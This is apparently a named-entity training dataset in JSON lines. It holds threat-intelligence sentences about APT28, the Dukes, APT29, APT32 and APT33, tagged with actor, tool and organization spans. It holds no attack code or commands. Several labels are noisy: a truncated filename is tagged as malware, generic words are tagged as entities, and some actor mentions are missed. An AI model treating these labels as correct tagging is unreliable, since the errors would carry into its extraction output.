{"text": "The targets of TG-4127 include military , government and defense sectors .", "spans": {"THREAT_ACTOR: TG-4127": [[15, 22]], "ORGANIZATION: defense sectors": [[57, 72]]}, "info": {"id": "dnrti_train_000084", "source": "dnrti_train"}}
{"text": "Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": {"THREAT_ACTOR: APT28": [[8, 13]], "TOOL: SOURFACE downloader": [[50, 69]], "TOOL: EVILTOSS": [[98, 106]], "TOOL: modular family of implants": [[115, 141]], "TOOL: CHOPSTICK": [[155, 164]]}, "info": {"id": "dnrti_train_000085", "source": "dnrti_train"}}
{"text": "Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"THREAT_ACTOR: APT28": [[38, 43]], "THREAT_ACTOR: group": [[48, 53]]}, "info": {"id": "dnrti_train_000089", "source": "dnrti_train"}}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": {"ORGANIZATION: media entities": [[183, 197]], "ORGANIZATION: dissidents": [[204, 214]], "ORGANIZATION: figures": [[219, 226]]}, "info": {"id": "dnrti_train_000091", "source": "dnrti_train"}}
{"text": "After compromising a political organization , APT28 will steal internal data .", "spans": {"ORGANIZATION: political organization": [[21, 43]], "THREAT_ACTOR: APT28": [[46, 51]]}, "info": {"id": "dnrti_train_000095", "source": "dnrti_train"}}
{"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian Government sponsors APT28 .", "spans": {"ORGANIZATION: Department of Homeland Security": [[28, 59]], "ORGANIZATION: DHS": [[62, 65]], "ORGANIZATION: FBI": [[106, 109]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: APT28": [[232, 237]]}, "info": {"id": "dnrti_train_000096", "source": "dnrti_train"}}
{"text": "In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [114, 119]]}, "info": {"id": "dnrti_train_000097", "source": "dnrti_train"}}
{"text": "In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [115, 120]]}, "info": {"id": "dnrti_train_000098", "source": "dnrti_train"}}
{"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: rockers": [[22, 29]], "ORGANIZATION: dissidents": [[34, 44]]}, "info": {"id": "dnrti_train_000099", "source": "dnrti_train"}}
{"text": "Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]]}, "info": {"id": "dnrti_train_000100", "source": "dnrti_train"}}
{"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": {"THREAT_ACTOR: APT28": [[54, 59]]}, "info": {"id": "dnrti_train_000103", "source": "dnrti_train"}}
{"text": "The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: APT28": [[4, 9]]}, "info": {"id": "dnrti_train_000105", "source": "dnrti_train"}}
{"text": "Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": {"THREAT_ACTOR: APT28": [[25, 30]], "THREAT_ACTOR: group": [[33, 38]]}, "info": {"id": "dnrti_train_000107", "source": "dnrti_train"}}
{"text": "The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": {"THREAT_ACTOR: APT28": [[23, 28]]}, "info": {"id": "dnrti_train_000108", "source": "dnrti_train"}}
{"text": "We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"THREAT_ACTOR: operators": [[36, 45]], "THREAT_ACTOR: APT28": [[53, 58]], "ORGANIZATION: citizens": [[86, 94], [98, 106]]}, "info": {"id": "dnrti_train_000109", "source": "dnrti_train"}}
{"text": "Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": {"THREAT_ACTOR: APT28": [[131, 136]]}, "info": {"id": "dnrti_train_000111", "source": "dnrti_train"}}
{"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": {"THREAT_ACTOR: Sofacy group": [[14, 26]], "TOOL: CORESHELL": [[97, 106]], "TOOL: SPLM": [[109, 113]], "TOOL: JHUHUGIT": [[116, 124]], "TOOL: AZZY": [[127, 131]]}, "info": {"id": "dnrti_train_000112", "source": "dnrti_train"}}
{"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "VULNERABILITY: Flash exploits": [[60, 74]], "TOOL: Carberp": [[92, 99]], "TOOL: JHUHUGIT downloaders": [[106, 126]]}, "info": {"id": "dnrti_train_000114", "source": "dnrti_train"}}
{"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: Flash exploits": [[49, 63]], "TOOL: Carberp": [[81, 88]], "TOOL: JHUHUGIT downloaders": [[95, 115]]}, "info": {"id": "dnrti_train_000115", "source": "dnrti_train"}}
{"text": "The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: Flash exploits": [[53, 67]], "TOOL: Carberp": [[85, 92]], "TOOL: JHUHUGIT downloaders": [[99, 119]]}, "info": {"id": "dnrti_train_000116", "source": "dnrti_train"}}
{"text": "Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"TOOL: SPLM": [[28, 32]], "TOOL: CHOPSTICK": [[35, 44]], "TOOL: XAgent": [[47, 53]]}, "info": {"id": "dnrti_train_000117", "source": "dnrti_train"}}
{"text": "Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": {"TOOL: backdoor tools": [[18, 32]], "THREAT_ACTOR: Sofacy group": [[53, 65]], "TOOL: Zebrocy": [[79, 86]]}, "info": {"id": "dnrti_train_000121", "source": "dnrti_train"}}
{"text": "As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 .", "spans": {"TOOL: Cannon tool": [[49, 60]], "THREAT_ACTOR: Sofacy group": [[67, 79]], "THREAT_ACTOR: Fancy Bear": [[86, 96]], "THREAT_ACTOR: APT28": [[99, 104]], "THREAT_ACTOR: STRONTIUM": [[107, 116]], "THREAT_ACTOR: Pawn Storm": [[119, 129]], "THREAT_ACTOR: Sednit": [[132, 138]]}, "info": {"id": "dnrti_train_000122", "source": "dnrti_train"}}
{"text": "Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"ORGANIZATION: citizens—journalists": [[8, 28]], "ORGANIZATION: software developers": [[31, 50]], "ORGANIZATION: politicians": [[53, 64]], "ORGANIZATION: researchers at universities": [[67, 94]], "ORGANIZATION: artists": [[101, 108]], "THREAT_ACTOR: Pawn Storm": [[130, 140]]}, "info": {"id": "dnrti_train_000123", "source": "dnrti_train"}}
{"text": "While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": {"TOOL: JHUHUGIT": [[10, 18]], "TOOL: JKEYSKW": [[43, 50]], "TOOL: AZZY Trojan": [[218, 229]]}, "info": {"id": "dnrti_train_000125", "source": "dnrti_train"}}
{"text": "Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "TOOL: backdoors": [[60, 69]], "TOOL: USB stealers": [[72, 84]], "TOOL: Mimikatz": [[126, 134]]}, "info": {"id": "dnrti_train_000126", "source": "dnrti_train"}}
{"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"TOOL: backdoors": [[57, 66]], "TOOL: USB stealers": [[69, 81]], "TOOL: Mimikatz": [[123, 131]]}, "info": {"id": "dnrti_train_000127", "source": "dnrti_train"}}
{"text": "Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": {"TOOL: Komplex": [[0, 7]], "THREAT_ACTOR: Sofacy": [[90, 96], [124, 130]], "TOOL: Carberp": [[103, 110]]}, "info": {"id": "dnrti_train_000130", "source": "dnrti_train"}}
{"text": "The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "TOOL: Komplex Trojan": [[29, 43]]}, "info": {"id": "dnrti_train_000131", "source": "dnrti_train"}}
{"text": "The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": {"TOOL: Komplex Trojan": [[4, 18]], "THREAT_ACTOR: Sofacy": [[48, 54]], "TOOL: Carberp": [[58, 65]]}, "info": {"id": "dnrti_train_000132", "source": "dnrti_train"}}
{"text": "This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"TOOL: MiniDuke": [[45, 53]], "TOOL: CosmicDuke": [[56, 66]], "TOOL: OnionDuke": [[69, 78]], "TOOL: CozyDuke": [[81, 89]], "THREAT_ACTOR: Dukes": [[104, 109]], "THREAT_ACTOR: cyberespionage group": [[162, 182]]}, "info": {"id": "dnrti_train_000133", "source": "dnrti_train"}}
{"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": {"ORGANIZATION: Kaspersky Labs": [[80, 94]], "TOOL: MiniDuke": [[113, 121]], "TOOL: Duke-related malware": [[146, 166]]}, "info": {"id": "dnrti_train_000136", "source": "dnrti_train"}}
{"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": {"THREAT_ACTOR: group": [[89, 94]], "TOOL: MiniDuke": [[119, 127]], "THREAT_ACTOR: threat actor": [[143, 155]], "THREAT_ACTOR: Dukes": [[219, 224]]}, "info": {"id": "dnrti_train_000137", "source": "dnrti_train"}}
{"text": "Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": {"TOOL: PinchDuke trojan samples": [[14, 38]], "THREAT_ACTOR: Dukes group": [[135, 146]]}, "info": {"id": "dnrti_train_000139", "source": "dnrti_train"}}
{"text": "This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years .", "spans": {"THREAT_ACTOR: Dukes group": [[56, 67]], "TOOL: CosmicDuke": [[176, 186]], "TOOL: PinchDuke": [[189, 198]], "TOOL: MiniDuke": [[205, 213]]}, "info": {"id": "dnrti_train_000140", "source": "dnrti_train"}}
{"text": "In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"THREAT_ACTOR: Dukes group": [[33, 44]], "TOOL: CosmicDuke": [[170, 180]]}, "info": {"id": "dnrti_train_000146", "source": "dnrti_train"}}
{"text": "The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "TOOL: CosmicDuke": [[39, 49]]}, "info": {"id": "dnrti_train_000147", "source": "dnrti_train"}}
{"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": {"THREAT_ACTOR: Dukes": [[43, 48]], "TOOL: SeaDuke": [[111, 118]], "TOOL: HammerDuke": [[123, 133]]}, "info": {"id": "dnrti_train_000148", "source": "dnrti_train"}}
{"text": "All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": {"THREAT_ACTOR: group": [[75, 80]]}, "info": {"id": "dnrti_train_000152", "source": "dnrti_train"}}
{"text": "Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: attackers": [[43, 52]], "THREAT_ACTOR: APT29": [[53, 58]]}, "info": {"id": "dnrti_train_000154", "source": "dnrti_train"}}
{"text": "APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "TOOL: The Onion Router": [[15, 31]], "TOOL: TOR domain fronting plugin meek": [[40, 71]], "ORGANIZATION: Google": [[146, 152]]}, "info": {"id": "dnrti_train_000155", "source": "dnrti_train"}}
{"text": "Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT29": [[22, 27]], "TOOL: POSHSPY": [[67, 74]]}, "info": {"id": "dnrti_train_000156", "source": "dnrti_train"}}
{"text": "Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "TOOL: POSHSPY": [[30, 37]], "THREAT_ACTOR: APT29": [[83, 88]]}, "info": {"id": "dnrti_train_000157", "source": "dnrti_train"}}
{"text": "In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": {"ORGANIZATION: Mandiant": [[22, 30]], "THREAT_ACTOR: APT29": [[64, 69]], "TOOL: POSHSPY": [[79, 86]]}, "info": {"id": "dnrti_train_000158", "source": "dnrti_train"}}
{"text": "POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": {"TOOL: POSHSPY": [[0, 7]], "THREAT_ACTOR: APT29": [[63, 68]]}, "info": {"id": "dnrti_train_000159", "source": "dnrti_train"}}
{"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]]}, "info": {"id": "dnrti_train_000160", "source": "dnrti_train"}}
{"text": "In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"THREAT_ACTOR: APT32": [[78, 83]], "ORGANIZATION: dissidents": [[146, 156]], "ORGANIZATION: journalists": [[161, 172]]}, "info": {"id": "dnrti_train_000161", "source": "dnrti_train"}}
{"text": "From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"ORGANIZATION: consumer products corporations": [[65, 95]], "THREAT_ACTOR: APT32": [[142, 147]]}, "info": {"id": "dnrti_train_000162", "source": "dnrti_train"}}
{"text": "From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"ORGANIZATION: consumer products corporations": [[29, 59]], "THREAT_ACTOR: APT32": [[106, 111]]}, "info": {"id": "dnrti_train_000163", "source": "dnrti_train"}}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]], "ORGANIZATION: diaspora": [[185, 193]]}, "info": {"id": "dnrti_train_000164", "source": "dnrti_train"}}
{"text": "In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 .", "spans": {"ORGANIZATION: FireEye": [[80, 87]], "THREAT_ACTOR: APT32": [[113, 118]]}, "info": {"id": "dnrti_train_000165", "source": "dnrti_train"}}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]]}, "info": {"id": "dnrti_train_000166", "source": "dnrti_train"}}
{"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: hospitality sectors": [[157, 176]]}, "info": {"id": "dnrti_train_000167", "source": "dnrti_train"}}
{"text": "APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: WINDSHIELD": [[94, 104]], "TOOL: KOMPROGO": [[107, 115]], "TOOL: SOUNDBITE": [[118, 127]], "TOOL: PHOREAL": [[134, 141]]}, "info": {"id": "dnrti_train_000168", "source": "dnrti_train"}}
{"text": "In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: actor": [[58, 63]], "ORGANIZATION: diaspora": [[142, 150]], "ORGANIZATION: government employees": [[175, 195]]}, "info": {"id": "dnrti_train_000169", "source": "dnrti_train"}}
{"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: Cobalt Strike backdoor": [[74, 96]]}, "info": {"id": "dnrti_train_000171", "source": "dnrti_train"}}
{"text": "Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"THREAT_ACTOR: operators": [[142, 151]], "ORGANIZATION: FireEye": [[154, 161]], "THREAT_ACTOR: APT32": [[176, 181]], "THREAT_ACTOR: cyber espionage group": [[187, 208]]}, "info": {"id": "dnrti_train_000172", "source": "dnrti_train"}}
{"text": "OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]], "THREAT_ACTOR: APT32": [[27, 32]], "THREAT_ACTOR: APT group": [[69, 78]]}, "info": {"id": "dnrti_train_000173", "source": "dnrti_train"}}
{"text": "While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": {"ORGANIZATION: Volexity": [[6, 14], [89, 97]], "THREAT_ACTOR: threat actor": [[74, 86]], "THREAT_ACTOR: OceanLotus": [[151, 161]]}, "info": {"id": "dnrti_train_000174", "source": "dnrti_train"}}
{"text": "During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": {"THREAT_ACTOR: APT32": [[24, 29]], "TOOL: customized PowerShell": [[90, 111]], "TOOL: Cobalt Strike": [[167, 180]], "TOOL: PowerSploit": [[183, 194]], "TOOL: Nishang": [[199, 206]]}, "info": {"id": "dnrti_train_000175", "source": "dnrti_train"}}
{"text": "However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": {"THREAT_ACTOR: group": [[107, 112]], "THREAT_ACTOR: APT33": [[168, 173]]}, "info": {"id": "dnrti_train_000176", "source": "dnrti_train"}}
{"text": "Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"THREAT_ACTOR: APT33": [[26, 31]], "THREAT_ACTOR: group": [[45, 50]]}, "info": {"id": "dnrti_train_000177", "source": "dnrti_train"}}
{"text": "We assess APT33 works at the behest of the Iranian government .", "spans": {"THREAT_ACTOR: APT33": [[10, 15]]}, "info": {"id": "dnrti_train_000178", "source": "dnrti_train"}}
{"text": "APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000179", "source": "dnrti_train"}}
{"text": "Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "TOOL: Backdoor.Win32.Denis": [[49, 69]], "THREAT_ACTOR: OceanLotus Group": [[77, 93]], "THREAT_ACTOR: threat actor": [[181, 193]]}, "info": {"id": "dnrti_train_000180", "source": "dnrti_train"}}
{"text": "APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation sector": [[60, 75]], "ORGANIZATION: energy sector": [[110, 123]]}, "info": {"id": "dnrti_train_000181", "source": "dnrti_train"}}
{"text": "From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": {"THREAT_ACTOR: APT33": [[35, 40]], "ORGANIZATION: organization": [[60, 72]], "ORGANIZATION: aerospace sector": [[80, 96]], "ORGANIZATION: business conglomerate": [[112, 133]]}, "info": {"id": "dnrti_train_000182", "source": "dnrti_train"}}
{"text": "From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": {"THREAT_ACTOR: APT33": [[35, 40]], "ORGANIZATION: aerospace sector": [[107, 123]]}, "info": {"id": "dnrti_train_000183", "source": "dnrti_train"}}
{"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]]}, "info": {"id": "dnrti_train_000184", "source": "dnrti_train"}}
{"text": "More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "ORGANIZATION: organization": [[63, 75]], "ORGANIZATION: business conglomerate": [[95, 116]], "MALWARE: malicious file": [[125, 139]], "ORGANIZATION: petrochemical company": [[212, 233]]}, "info": {"id": "dnrti_train_000185", "source": "dnrti_train"}}
{"text": "More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "MALWARE: malicious file": [[102, 116]]}, "info": {"id": "dnrti_train_000186", "source": "dnrti_train"}}
{"text": "We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[112, 117]]}, "info": {"id": "dnrti_train_000187", "source": "dnrti_train"}}
{"text": "APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000188", "source": "dnrti_train"}}
{"text": "The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": {"THREAT_ACTOR: threat groups": [[146, 159]], "THREAT_ACTOR: actors": [[221, 227]]}, "info": {"id": "dnrti_train_000189", "source": "dnrti_train"}}
{"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: employees": [[36, 45]]}, "info": {"id": "dnrti_train_000190", "source": "dnrti_train"}}
{"text": "APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation companies": [[67, 85]]}, "info": {"id": "dnrti_train_000191", "source": "dnrti_train"}}
{"text": "We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries .", "spans": {"TOOL: APT33 malware": [[14, 27]]}, "info": {"id": "dnrti_train_000192", "source": "dnrti_train"}}
{"text": "APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "THREAT_ACTOR: threat actor": [[137, 149]]}, "info": {"id": "dnrti_train_000193", "source": "dnrti_train"}}
{"text": "APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "THREAT_ACTOR: threat groups": [[93, 106]]}, "info": {"id": "dnrti_train_000194", "source": "dnrti_train"}}
{"text": "This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": {"TOOL: name servers": [[139, 151]], "THREAT_ACTOR: APT33": [[181, 186]]}, "info": {"id": "dnrti_train_000195", "source": "dnrti_train"}}
{"text": "The publicly available backdoors and tools utilized by APT33 – including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "TOOL: NANOCORE": [[73, 81]], "TOOL: NETWIRE": [[84, 91]], "TOOL: ALFA Shell": [[98, 108]], "THREAT_ACTOR: hackers": [[183, 190]], "THREAT_ACTOR: threat groups": [[229, 242]]}, "info": {"id": "dnrti_train_000196", "source": "dnrti_train"}}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000197", "source": "dnrti_train"}}
{"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor .", "spans": {"ORGANIZATION: energy sectors": [[67, 81]], "THREAT_ACTOR: APT33": [[101, 106]]}, "info": {"id": "dnrti_train_000198", "source": "dnrti_train"}}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000199", "source": "dnrti_train"}}
{"text": "We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": {}, "info": {"id": "dnrti_train_000200", "source": "dnrti_train"}}
{"text": "The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin": [[4, 9]], "THREAT_ACTOR: espionage group": [[10, 25]], "THREAT_ACTOR: APT33": [[32, 37]]}, "info": {"id": "dnrti_train_000201", "source": "dnrti_train"}}
{"text": "On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[17, 46]], "THREAT_ACTOR: APT33": [[153, 158]]}, "info": {"id": "dnrti_train_000202", "source": "dnrti_train"}}
{"text": "The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin group": [[4, 15]], "THREAT_ACTOR: APT33": [[22, 27]]}, "info": {"id": "dnrti_train_000203", "source": "dnrti_train"}}
{"text": "On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[17, 46]], "THREAT_ACTOR: APT33": [[109, 114]]}, "info": {"id": "dnrti_train_000204", "source": "dnrti_train"}}
